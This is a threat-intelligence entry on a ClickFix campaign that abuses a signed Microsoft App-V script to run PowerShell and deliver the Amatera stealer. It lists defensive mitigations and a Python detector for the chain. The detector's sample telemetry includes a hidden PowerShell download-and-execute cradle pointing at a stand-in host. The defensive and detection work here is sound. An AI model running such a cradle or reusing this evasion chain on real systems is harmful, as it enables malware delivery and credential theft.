ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services

Severity: Medium
Tags: Vulnerability, web
Published: Tue Jan 27 2026 (01/27/2026, 14:38:00 UTC)
Source: The Hacker News

Description

Cybersecurity researchers have disclosed details of a new campaign that combines ClickFix-style fake CAPTCHAs with a signed Microsoft Application Virtualization (App-V) script to distribute an information stealer called Amatera. "Instead of launching PowerShell directly, the attacker uses this script to control how execution begins and to avoid more common, easily recognized execution paths,"

AI-Powered Analysis

Last updated: 01/27/2026, 20:27:38 UTC

Technical Analysis

The ClickFix attack campaign represents a sophisticated evolution of social engineering combined with living-off-the-land (LotL) techniques to distribute the Amatera information stealer. The attack begins with a fake CAPTCHA prompt that tricks users into copying and pasting a malicious command into the Windows Run dialog. Unlike traditional ClickFix attacks, which invoke PowerShell directly, this campaign abuses SyncAppvPublishingServer.vbs, a signed Microsoft Application Virtualization (App-V) Visual Basic Script, to proxy PowerShell execution. Because the script is a legitimate, signed Windows component, the chain sidesteps PowerShell execution restrictions and common detection mechanisms.

The App-V script, run through wscript.exe, downloads an obfuscated in-memory loader from an external server; the loader then fetches its configuration from a public Google Calendar ICS file. Externalizing the configuration lets the operators rotate infrastructure and change delivery without redeploying the initial infection stages. Subsequent stages execute intermediate PowerShell loaders and retrieve encrypted payloads concealed within PNG images via WinINet APIs. These payloads are decrypted and decompressed in memory before shellcode launches the Amatera Stealer.

The campaign includes anti-sandbox checks and requires manual user interaction, which complicates automated detection and analysis. The use of trusted third-party services and blockchain smart contracts for payload delivery further complicates detection. ClickFix and its variants (JackFix, CrashFix, GlitchFix) have been widely adopted by threat actors since 2025, targeting social media content creators and businesses seeking verification, with account takeover as the goal. The campaign’s reliance on legitimate user actions and trusted system tools presents unique challenges for endpoint detection and response solutions.

The App-V component is only present in Windows Enterprise and Education editions, indicating a focus on enterprise environments. The campaign’s modular design and use of living-off-the-land binaries exemplify advanced attacker tradecraft aimed at stealth and persistence.

Potential Impact

European organizations using Windows Enterprise or Education editions are particularly vulnerable due to the presence of the App-V component required for the attack chain. The campaign targets high-value individuals and businesses involved in social media content creation and verification processes, which are prevalent across Europe’s digital economy. Successful infections lead to the deployment of the Amatera information stealer, risking the exfiltration of sensitive credentials, tokens, and personal data, potentially resulting in account takeovers, financial fraud, and reputational damage. The use of trusted Microsoft components and legitimate third-party services complicates detection, increasing the likelihood of prolonged undetected presence within networks. The requirement for user interaction and clipboard manipulation means that phishing and social engineering defenses are critical. The campaign’s modular and flexible infrastructure allows rapid adaptation, increasing operational resilience and persistence. Given Europe’s strong regulatory environment (e.g., GDPR), data breaches resulting from such infections could lead to significant compliance penalties and legal consequences. The attack’s stealth and evasion techniques also pose challenges for incident response teams, potentially increasing remediation costs and operational disruption.

Mitigation Recommendations

European organizations should implement targeted mitigations beyond generic advice:
1) Disable or restrict the use of App-V components where not required, especially SyncAppvPublishingServer.vbs, through application control policies or Windows Defender Application Control (WDAC).
2) Employ advanced endpoint detection and response (EDR) solutions capable of detecting living-off-the-land techniques and monitoring unusual usage of trusted signed scripts and binaries.
3) Enforce strict clipboard monitoring and user education programs to reduce the risk of users executing commands copied from untrusted sources.
4) Implement network controls to monitor and restrict outbound connections to suspicious domains, including those hosting payloads or configuration files (e.g., jsDelivr CDN, Google Calendar ICS files).
5) Use multi-factor authentication (MFA) and continuous session validation to mitigate the impact of stolen credentials and tokens.
6) Deploy sandboxing and behavioral analysis tools that can detect multi-stage, in-memory PowerShell execution and obfuscated payloads.
7) Regularly audit and harden browser and social media platform security settings to reduce the risk of token theft via social engineering.
8) Monitor for indicators of compromise related to Amatera Stealer and ClickFix variants, including unusual PowerShell activity proxied through App-V scripts.
9) Collaborate with threat intelligence sharing communities to stay updated on evolving ClickFix tactics and infrastructure.
10) Consider restricting or monitoring the use of wscript.exe and other scripting hosts in enterprise environments.
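As an added detection example (not code from the article or from this analysis), the following Python checks Sysmon-style process-creation records for the chain described above: SyncAppvPublishingServer.vbs started through a script host from an interactive parent such as the Run dialog, and PowerShell spawned by that script host carrying a download cradle. The event shape, the sample command lines and the assumption that the legitimate publishing refresh is task-driven rather than interactive are constructed for illustration.

```python
import re
from dataclasses import dataclass

APPV_SCRIPT = "syncappvpublishingserver.vbs"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Interactive parents (Run dialog children have explorer.exe as parent); the real refresh is task-driven.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
# Command-line fragments typical of a download cradle rather than a publishing refresh.
CRADLE_RE = re.compile(r"https?://|downloadstring|invoke-webrequest|\biwr\b|\biex\b|-enc", re.I)

@dataclass
class ProcEvent:
    """Minimal Sysmon Event ID 1-style process-creation record (constructed shape)."""
    pid: int
    ppid: int
    image: str
    parent_image: str
    cmdline: str

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze(events):
    """Return (pid, rule_name) pairs for the App-V script -> PowerShell proxy chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        img, parent, cmd = basename(e.image), basename(e.parent_image), e.cmdline.lower()
        # Rule 1: the App-V publishing script launched from an interactive shell.
        if img in SCRIPT_HOSTS and APPV_SCRIPT in cmd and parent in INTERACTIVE_PARENTS:
            alerts.append((e.pid, "appv_script_interactive_launch"))
        # Rule 2: PowerShell spawned by that script host and carrying a download cradle.
        if img in {"powershell.exe", "pwsh.exe"} and parent in SCRIPT_HOSTS:
            p = by_pid.get(e.ppid)
            if p and APPV_SCRIPT in p.cmdline.lower() and CRADLE_RE.search(cmd):
                alerts.append((e.pid, "appv_proxied_powershell_cradle"))
    return alerts

# Constructed sample telemetry: a benign scheduled refresh (pids 3000/3010), then the abuse chain.
SAMPLE_EVENTS = [
    ProcEvent(3000, 900, r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\svchost.exe",
              r'wscript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "<refresh args>"'),
    ProcEvent(3010, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wscript.exe", "powershell.exe -NonInteractive -Command Sync-AppvPublishingServer"),
    ProcEvent(4201, 1500, r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
              r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "<attacker-controlled argument>"'),
    ProcEvent(4233, 4201, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\wscript.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://loader.example.invalid/cfg')\""),
]
```

Running analyze(SAMPLE_EVENTS) flags only the interactively launched script (pid 4201) and its PowerShell child (pid 4233); the scheduler-driven refresh stays silent, which is the baseline the rules depend on.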


Technical Details

Article Source: https://thehackernews.com/2026/01/clickfix-attacks-expand-using-fake.html (fetched 2026-01-27T20:26:47.965Z, 2031 words)

Threat ID: 69791f8b4623b1157c45d41f

Added to database: 1/27/2026, 8:26:51 PM

Last enriched: 1/27/2026, 8:27:38 PM

Last updated: 2/7/2026, 11:51:11 AM

Views: 201

Community Reviews

0 reviews

